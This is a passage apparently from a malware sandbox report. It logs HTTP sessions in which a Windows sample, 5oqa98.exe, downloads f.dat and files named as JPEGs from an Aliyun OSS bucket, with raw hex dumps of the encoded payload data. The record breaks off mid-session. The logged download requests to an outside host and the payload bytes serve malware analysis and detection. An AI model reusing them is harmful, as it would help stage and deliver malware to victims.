                                                    2025-01-06 03:44:00 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                    Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                    Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                    Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
                                                    Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39
                                                    Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                    Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                    2025-01-06 03:44:00 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                    Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                    Session ID:8
                                                    Source IP:192.168.2.9
                                                    Source Port:49982
                                                    Destination IP:118.178.60.94
                                                    Destination Port:443
                                                    PID:7688
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-06 03:44:04 UTC  110  OUT  GET /f.dat HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:44:04 UTC  558  IN  HTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:44:04 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 879
                                                    Connection: close
                                                    x-oss-request-id: 677B51847CF84234349AF79F
                                                    Accept-Ranges: bytes
                                                    ETag: "E54C4296F011EC91D935AA353C936E34"
                                                    Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 11142793972884948456
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000113
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                    x-oss-server-time: 7
                                                    2025-01-06 03:44:04 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                    Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                    Session ID:9
                                                    Source IP:192.168.2.9
                                                    Source Port:49983
                                                    Destination IP:118.178.60.94
                                                    Destination Port:443
                                                    PID:7688
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-06 03:44:05 UTC  115  OUT  GET /FOM-50.jpg HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:44:06 UTC  546  IN  HTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:44:06 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 55085
                                                    Connection: close
                                                    x-oss-request-id: 677B518694C77F3736000671
                                                    Accept-Ranges: bytes
                                                    ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                    Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 12339968747348072397
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000105
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                    x-oss-server-time: 9
                                                    2025-01-06 03:44:06 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                    Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                    Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                    2025-01-06 03:44:06 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                    Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                    Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                    Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                    Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                    2025-01-06 03:44:06 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                    Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                    Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                    2025-01-06 03:44:06 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                    Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                    Session ID:10
                                                    Source IP:192.168.2.9
                                                    Source Port:49984
                                                    Destination IP:118.178.60.94
                                                    Destination Port:443
                                                    PID:7688
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-06 03:44:07 UTC  115  OUT  GET /FOM-51.jpg HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:44:08 UTC  548  IN  HTTP/1.1 200 OK
                                                    Server: AliyunOSS
